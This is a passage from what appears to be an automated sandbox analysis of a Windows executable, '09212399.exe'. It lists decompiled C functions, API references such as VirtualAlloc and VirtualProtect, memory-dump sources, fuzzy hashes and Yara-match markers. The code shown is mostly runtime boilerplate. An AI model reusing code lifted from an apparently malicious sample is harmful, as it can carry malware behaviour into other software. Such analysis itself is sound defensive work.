								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x46d384;
						while(1) {
							_t78 = E00417CFF(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x46d368 =  *0x46d368 + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x46d368 - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x46d368; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}

0x00415ee1
0x00415ee9
0x00415ef3
0x00415ef8
0x00415f02
0x00415f02
0x00415f28
0x00415f28
0x00415f2a
0x00000000
0x00000000
0x00415f0a
0x00415f0d
0x00415f11
0x00415f15
0x00415f19
0x00415f1f
0x00415f22
0x00415f22
0x00415f22
0x00415f34
0x00415f3a
0x00415f40
0x0041602f
0x0041602f
0x0041602f
0x00416031
0x00416031
0x0041603a
0x0041603d
0x00416040
0x004160b1
0x004160b1
0x004160b1
0x00000000
0x004160b1
0x00416042
0x00416044
0x00416048
0x00416059
0x0041605b
0x0041605b
0x0041604a
0x0041604c
0x0041604c
0x00416065
0x00416067
0x0041606a
0x004160ab
0x004160ab
0x0041606c
0x0041606d
0x00416073
0x00416075
0x00000000
0x00000000
0x00416077
0x0041607c
0x0041607f
0x00416081
0x00416089
0x0041608c
0x0041608e
0x0041608e
0x0041608e
0x0041608e
0x00416083
0x00416083
0x00416083
0x00416092
0x00416095
0x0041609b
0x004160a0
0x004160a4
0x0041604f
0x0041604f
0x004160cd
0x00000000
0x004160a6
0x004160a6
0x00000000
0x004160a6
0x004160a4
0x004160b5
0x004160b5
0x004160b6
0x004160b6
0x004160c5
0x004160cb
0x004160cb
0x00000000
0x004160cb
0x00415f46
0x00415f4a
0x00415f4c
0x00000000
0x00000000
0x00415f52
0x00415f54
0x00415f5a
0x00415f63
0x00415f65
0x00415f67
0x00415f67
0x00415f69
0x00415f6f
0x00415fbf
0x00415fbf
0x00415fc1
0x00415fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00415fc5
0x00415fc5
0x00415fc9
0x00415fcb
0x00415fce
0x00000000
0x00000000
0x00415fd0
0x00415fd3
0x00415fd6
0x00000000
0x00000000
0x00415fd8
0x00415fdb
0x00415fe8
0x00415ffc
0x00416005
0x0041600a
0x0041600d
0x00416010
0x00416016
0x0041601b
0x0041601f
0x00000000
0x00000000
0x00416021
0x00416021
0x00416021
0x00000000
0x00416021
0x00415fe4
0x00415fe6
0x00000000
0x00000000
0x00000000
0x00416024
0x00416024
0x00416029
0x0041602a
0x0041602b
0x0041602b
0x00000000
0x00415f71
0x00415f71
0x00415f76
0x00415f77
0x00415f7c
0x00415f7f
0x00000000
0x00000000
0x00415f81
0x00415f88
0x00415f8a
0x00415f8a
0x00415fa8
0x00415fa8
0x00415faa
0x00000000
0x00000000
0x00415f92
0x00415f95
0x00415f99
0x00415f9d
0x00415fa3
0x00415fa6
0x00415fa6
0x00415fa6
0x00415fac
0x00415faf
0x00415fb5
0x00000000
0x00000000
0x00000000
0x00415fb7
0x00415fb9
0x00000000
0x00415fb9
0x00415f6f
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 00415F34
GetFileType.KERNEL32(?), ref: 00415FDE
GetStdHandle.KERNEL32(-000000F6), ref: 0041605F

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: f74e7b2c2cf7942dfa544e55c168ab80dfa055f92cdce9298f00899d9ae36ded
Instruction ID: 03bdf7f8be445e71ddc1f4c6b04c43b9ab2951d109389afc2590ef25b7aac7e5
Opcode Fuzzy Hash: f74e7b2c2cf7942dfa544e55c168ab80dfa055f92cdce9298f00899d9ae36ded
Instruction Fuzzy Hash: BE51E1316047418FD720CF28D8847E67BE4EB49324F25866EE5A6C72E1E778D4CAC70A

Uniqueness

Uniqueness Score: -1.00%

Function 023EAF82 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ffd30c2974a2f52cef7945394f88df6bd8584c3a391fddb969392e798b8edc5
Instruction ID: e99c011625acf2add42cbd592420f8af6b50012f78cb9d898d564e2d64c84741
Opcode Fuzzy Hash: 4ffd30c2974a2f52cef7945394f88df6bd8584c3a391fddb969392e798b8edc5
Instruction Fuzzy Hash: 5341F1B2E012359ECF32AF659C849BFFA76FB057687004539E927A22D0E3344C498F95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A11B Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041A11B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x46abe8);
				E004161C8(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x46d364 - 3;
						if( *0x46d364 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x46d360, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x46cfa0; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E00418BF0(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x46cfa0; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E004164B0(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E00417DF4(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E0041A283();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x46d360, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x46d11c; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E004182F4();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E004185D3();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E004143A0( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E00417DF4(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E00417E1F();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x46d360, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E004143A0( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E00417E1F();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E00418BF0(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E00416C4A(0, _t59, _t61, __eflags);
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E00417CFF( *(_t67 + 0xc));
					L37:
					return E00416203(_t28);
				}
			}

0x0041a11b
0x0041a11d
0x0041a122
0x0041a127
0x0041a12e
0x0041a13e
0x0041a141
0x0041a143
0x0041a151
0x0041a158
0x0041a28c
0x0041a28c
0x0041a28e
0x0041a291
0x0041a293
0x0041a295
0x0041a299
0x0041a299
0x0041a299
0x0041a2a3
0x0041a2a3
0x0041a2a9
0x0041a2ab
0x00000000
0x00000000
0x0041a2ad
0x0041a2b3
0x00000000
0x00000000
0x0041a2b6
0x0041a2bc
0x0041a2be
0x00000000
0x00000000
0x00000000
0x0041a2be
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a15e
0x0041a15e
0x0041a15e
0x0041a161
0x0041a164
0x0041a25b
0x0041a25b
0x0041a25e
0x0041a260
0x00000000
0x00000000
0x0041a262
0x0041a268
0x00000000
0x00000000
0x00000000
0x0041a268
0x0041a16c
0x0041a172
0x0041a176
0x0041a17c
0x0041a17f
0x0041a181
0x0041a22b
0x0041a22b
0x0041a22f
0x0041a234
0x0041a237
0x0041a239
0x0041a23b
0x0041a23f
0x0041a23f
0x0041a23f
0x0041a243
0x0041a243
0x0041a246
0x0041a258
0x0041a258
0x00000000
0x0041a237
0x0041a187
0x0041a18d
0x0041a18f
0x0041a190
0x0041a191
0x0041a192
0x0041a197
0x0041a19a
0x0041a19c
0x0041a1a3
0x0041a1a4
0x0041a1aa
0x0041a1ad
0x0041a1af
0x0041a1b4
0x0041a1b5
0x0041a1b8
0x0041a1ba
0x0041a1bc
0x0041a1bc
0x0041a1c3
0x0041a1c9
0x0041a1ce
0x0041a1d1
0x0041a1d2
0x0041a1d3
0x0041a1d8
0x0041a1d8
0x0041a19e
0x0041a19e
0x0041a19e
0x0041a19c
0x0041a1db
0x0041a1de
0x0041a1e0
0x0041a1e2
0x0041a1e6
0x0041a1e6
0x0041a1e7
0x0041a1e7
0x0041a1ed
0x0041a1f0
0x0041a1fb
0x0041a201
0x0041a204
0x0041a206
0x0041a20b
0x0041a20c
0x0041a20f
0x0041a211
0x0041a213
0x0041a213
0x0041a21a
0x0041a21f
0x0041a220
0x0041a223
0x0041a228
0x0041a228
0x0041a206
0x00000000
0x0041a26a
0x0041a26b
0x0041a271
0x0041a271
0x00000000
0x0041a145
0x0041a145
0x0041a146
0x0041a2c0
0x0041a2c0
0x0041a2c0
0x00000000
0x0041a2c0
0x0041a130
0x0041a133
0x0041a2c2
0x0041a2c7
0x0041a2c7

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a456349c1de398063f9a386a85bf469116e93a501e68ae33ecf67ce303af91c
Instruction ID: 64bf046e7b18df44672152061873ff19ccaaf08e4a0da4488104b260fdb6444f
Opcode Fuzzy Hash: 8a456349c1de398063f9a386a85bf469116e93a501e68ae33ecf67ce303af91c
Instruction Fuzzy Hash: E741D471D02125AA8F207F669C844EF7B74EB06724B10416FFD24A6391D73D4DE18B9E

Uniqueness

Uniqueness Score: -1.00%

Function 023EB1F5 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 023EB20F
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 023EB220
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 023EB266
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 023EB2A4
VirtualProtect.KERNEL32(?,?,0046CC80,?,?,?,0000001C), ref: 023EB2CA

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: bfb6f72ee8a59cef922101f7b8c88ed20b11edd10dc3926e71ca04d4c0d93445
Instruction ID: 89ec22df03b8cc555d6573475f679956d2773dc6600cf0e1fdd86befb8e48fc9
Opcode Fuzzy Hash: bfb6f72ee8a59cef922101f7b8c88ed20b11edd10dc3926e71ca04d4c0d93445
Instruction Fuzzy Hash: 3D318431D1022DEBDF11CBA4DC45AEEBBB9FF08358F144565E906E7290D7709A48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 023E5C18 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(023EAF81,00000000,023E9A53,023E72D9,00000000,0046A108,00000008,023E7330,023EAF81,?,?,023E64E6,00000008,00469CD0,00000008,023E65B4), ref: 023E5C1A
FlsGetValue.KERNEL32(?,?,023E64E6,00000008,00469CD0,00000008,023E65B4,00000000,00000001,00000000,023EAF81,00000003), ref: 023E5C28
SetLastError.KERNEL32(00000000,?,?,023E64E6,00000008,00469CD0,00000008,023E65B4,00000000,00000001,00000000,023EAF81,00000003), ref: 023E5C7E

Part of subcall function 023E7348: __lock.LIBCMT ref: 023E738C
Part of subcall function 023E7348: RtlAllocateHeap.NTDLL(00000008,00000000,0046A118), ref: 023E73CA

FlsSetValue.KERNEL32(00000000,?,?,023E64E6,00000008,00469CD0,00000008,023E65B4,00000000,00000001,00000000,023EAF81,00000003), ref: 023E5C4F
GetCurrentThreadId.KERNEL32 ref: 023E5C67

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
String ID:
API String ID: 1487844433-0
Opcode ID: 12f544027e430db05bde684fdec541818b8688e2dfe7760ed1267b77d1f21185
Instruction ID: 3fbf8c9fdbff688cdf9d2c2541b98ee7559684570ad2286968b886a1b9959318
Opcode Fuzzy Hash: 12f544027e430db05bde684fdec541818b8688e2dfe7760ed1267b77d1f21185
Instruction Fuzzy Hash: ADF0F671201721DFDB302F70AD4C69A7BA4EB01769F004228E487966E1EFB084088BE9

Uniqueness

Uniqueness Score: -1.00%

Function 023EADD4 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 023EADEF
GetCurrentProcessId.KERNEL32 ref: 023EADFB
GetCurrentThreadId.KERNEL32 ref: 023EAE03
GetTickCount.KERNEL32 ref: 023EAE0B
QueryPerformanceCounter.KERNEL32(?), ref: 023EAE17

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 173bdef380c8610e7581f8fd7bc009a816ec993ed89b2a8136167583bd8596ce
Instruction ID: dcbbc3cb6dc2daf69950680bbaf0b6ea7f261f10fab16f29e53cff3a8a3898c5
Opcode Fuzzy Hash: 173bdef380c8610e7581f8fd7bc009a816ec993ed89b2a8136167583bd8596ce
Instruction Fuzzy Hash: 36F0E772C011289BCF10ABF4ED485DEB7F8FB482457824566D852EB110EB70A904CA89

Uniqueness

Uniqueness Score: -1.00%

Function 023EAB46 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 023EAC1E
_strcat.LIBCMT ref: 023EAC3B
___shr_12.LIBCMT ref: 023EAD04

Strings

?, xrefs: 023EAB9B

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: _strcat$___shr_12
String ID: ?
API String ID: 1152255961-1684325040
Opcode ID: f98abbc4f2bfaa9b74e99d204432f086223d4e92d131cd96935bdd782cd27a01
Instruction ID: 9e9b234dd4550728ac236424ebaf4b43e835d9689b4a76562430af455aee7ca9
Opcode Fuzzy Hash: f98abbc4f2bfaa9b74e99d204432f086223d4e92d131cd96935bdd782cd27a01
Instruction Fuzzy Hash: 8081F3318042AADECF11CB68C8947EEBBB5AF11314F08459AD893EB2C2D774960DC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 023D2EF7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000002,00000008,?), ref: 023D2F6D
HeapFree.KERNEL32(00000002,00000000,00000000), ref: 023D305F

Strings

, xrefs: 023D2FBB
@, xrefs: 023D2FB7

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: $@
API String ID: 2488874121-1077428164
Opcode ID: 25de4051bcc026e3433f15fab5d74b215f8311b7561810a204b3cd1293105156
Instruction ID: 32d30c500abac0f05e28f02b3ce0b299ce790d720f8d16fe966833cd679228e8
Opcode Fuzzy Hash: 25de4051bcc026e3433f15fab5d74b215f8311b7561810a204b3cd1293105156
Instruction Fuzzy Hash: FC51E672D043999BDB21CBA8D4507FEBFB4AF09304F4880D9D895BB282D3764946CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 023E6B7A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 023E6B8C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\09212399.exe,00000104), ref: 023E6BA4

Strings

C:\Users\user\Desktop\09212399.exe, xrefs: 023E6B96, 023E6B9B
3y, xrefs: 023E6BAA

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: FileModuleName___initmbctable
String ID: 3y$C:\Users\user\Desktop\09212399.exe
API String ID: 767393020-2123444629
Opcode ID: 2e40ab65cb585c3d7f836c8e7bd6ec9b5b700da5b97b02402c81dae8d5da7434
Instruction ID: a341ebf89ba82b9e424ef66510ce95ae1432808063b60248507d18c2871d1de1
Opcode Fuzzy Hash: 2e40ab65cb585c3d7f836c8e7bd6ec9b5b700da5b97b02402c81dae8d5da7434
Instruction Fuzzy Hash: 7811ABB2E04124ABDF10DB99EC8199A7BBCEB55360F10017AE446D3290EB709E488F55

Uniqueness

Uniqueness Score: -1.00%

Function 00415D13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415D13() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				CHAR* _t37;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x46d48c; // 0x1
				if(_t45 == 0) {
					E00416C2C();
				}
				_t37 = "C:\\Users\\hardz\\Desktop\\09212399.exe";
				 *0x46cdcc = 0;
				GetModuleFileNameA(0, _t37, 0x104);
				_t10 =  *0x46d490; // 0x793320
				 *0x46ccb0 = _t37;
				if(_t10 == 0) {
					L4:
					_t25 = _t37;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E00415BA7(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E00417CFF(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E00415BA7(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x46cc94 = _v8 - 1;
					 *0x46cc98 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}

0x00415d17
0x00415d1d
0x00415d23
0x00415d25
0x00415d25
0x00415d2f
0x00415d36
0x00415d3d
0x00415d43
0x00415d4a
0x00415d50
0x00415d59
0x00415d59
0x00415d52
0x00415d55
0x00415d57
0x00000000
0x00000000
0x00415d57
0x00415d67
0x00415d72
0x00415d78
0x00415d7d
0x00415d84
0x00415d98
0x00415da2
0x00415da8
0x00415dae
0x00415d86
0x00415d86
0x00415d86
0x00415db4

APIs

___initmbctable.LIBCMT ref: 00415D25
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\09212399.exe,00000104,74CB4DE0,00000000,?,?,?,?,00414CD5,?,00469BF8,00000060), ref: 00415D3D

Strings

C:\Users\user\Desktop\09212399.exe, xrefs: 00415D2F, 00415D34
3y, xrefs: 00415D43

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileModuleName___initmbctable
String ID: 3y$C:\Users\user\Desktop\09212399.exe
API String ID: 767393020-2123444629
Opcode ID: 2e40ab65cb585c3d7f836c8e7bd6ec9b5b700da5b97b02402c81dae8d5da7434
Instruction ID: afb3524ee611b600a9c03775bfed18d7cdff7f881496a0d9c641cc0fe768da31
Opcode Fuzzy Hash: 2e40ab65cb585c3d7f836c8e7bd6ec9b5b700da5b97b02402c81dae8d5da7434
Instruction Fuzzy Hash: 7911E7B2A04104EBD710DBA9AC859DB7BB8EB85364F10017FF809D3240EAB4AD44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417D21 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00417D21(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x46a3a0);
				E004161C8(_t13, _t14, _t15);
				_t9 =  *0x46cf4c;
				if(_t9 == 0) {
					if( *0x46cc80 == 1) {
						L4:
						_t9 = E00417D11;
						 *0x46cf4c = E00417D11;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x46cf4c = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E00416203(_t10);
			}

0x00417d21
0x00417d23
0x00417d28
0x00417d2d
0x00417d34
0x00417d3d
0x00417d63
0x00417d63
0x00417d68
0x00417d3f
0x00417d44
0x00417d4c
0x00000000
0x00417d4e
0x00417d54
0x00417d5a
0x00417d61
0x00000000
0x00000000
0x00417d61
0x00417d4c
0x00417d3d
0x00417d6d
0x00417d79
0x00417da2
0x00417dab

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,0046A3A0,00000010,00416388,00000000,00000FA0,74CB4DE0,00000000,00414F6E,00414C96,?,00469BF8,00000060), ref: 00417D44
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00417D54

Strings

kernel32.dll, xrefs: 00417D3F
InitializeCriticalSectionAndSpinCount, xrefs: 00417D4E

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: e8aa5cc929c4a9b8fdcb73c900c478a2fd141332feee895c4bca72c48a3bdc9f
Instruction ID: 16c5ef16218265bbd5a911d1db60bf565c8edfbefc5c37e48b90419e28d4138f
Opcode Fuzzy Hash: e8aa5cc929c4a9b8fdcb73c900c478a2fd141332feee895c4bca72c48a3bdc9f
Instruction Fuzzy Hash: 1BF03030644309AACF249F75AC857ED3AB5AF04714B108166F410A63A1EB7CD5C49F1E

Uniqueness

Uniqueness Score: -1.00%

Function 0041557F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041557F() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x469c80;
					_v20 =  *0x469c78;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x469c70]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00415584
0x0041558c
0x004155a3
0x0041554b
0x00415554
0x00415560
0x00415563
0x00415569
0x0041556f
0x00415574
0x0041557e
0x00415576
0x0041557a
0x0041557a
0x0041558e
0x00415594
0x0041559c
0x00000000
0x0041559e
0x0041559e
0x004155a2
0x004155a2
0x0041559c

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00414B59), ref: 00415584
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00415594

Strings

KERNEL32, xrefs: 0041557F
IsProcessorFeaturePresent, xrefs: 0041558E

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 1c7cc41784ba4993f88f6cdfd34541fc7b0df387887fbad2922e2ad007823897
Instruction ID: 8c4ce676d8cc4b7b76586083e983daa4673e943c6c6b95c05bf310d9e1c10411
Opcode Fuzzy Hash: 1c7cc41784ba4993f88f6cdfd34541fc7b0df387887fbad2922e2ad007823897
Instruction Fuzzy Hash: 97C01230342601B9DE101771AD0DBDA144E5F80B02F1040566019D1184DFFCC640806F

Uniqueness

Uniqueness Score: -1.00%

Function 00402090 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 148
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00402090(void* _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed short* _v12;
				signed int _v16;
				signed char* _v20;
				signed int _v24;
				signed int _v28;
				signed short* _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				signed short* _t79;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				signed int _t101;
				signed int _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed short* _t107;
				signed short _t108;
				signed int _t110;
				signed char* _t112;
				signed int _t116;
				intOrPtr* _t119;
				signed char _t124;
				signed short* _t126;
				void* _t130;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				void* _t136;

				_t108 =  *0x41b594; // 0x30
				_t79 = 0x41b594;
				_v24 = 0;
				_v16 = 0;
				_v12 = 0x41b594;
				if(_t108 != 0) {
					_t126 = 0x41b594;
					do {
						_v12 =  &(_v12[1]);
						_t126 =  &(_t126[1]);
					} while ( *_t126 != 0);
				}
				_v12 =  &(_v12[1]);
				if(_t108 != 0) {
					_v32 = _t79;
					while(1) {
						_t105 = _v12 + _v24;
						_t87 =  *_t79 & 0x3fff;
						_t110 = 0xc;
						_v40 = _t87;
						_t88 = _t87 / _t110;
						_v36 = _t105;
						_t132 = _t88;
						if(_t87 % _t110 != 0) {
							break;
						}
						_t130 = HeapAlloc(_a4, 8, _t88 << 2);
						if(_t130 != 0) {
							_t91 = 0;
							if(_t132 > 0) {
								_t119 = _t105 + 0xa;
								do {
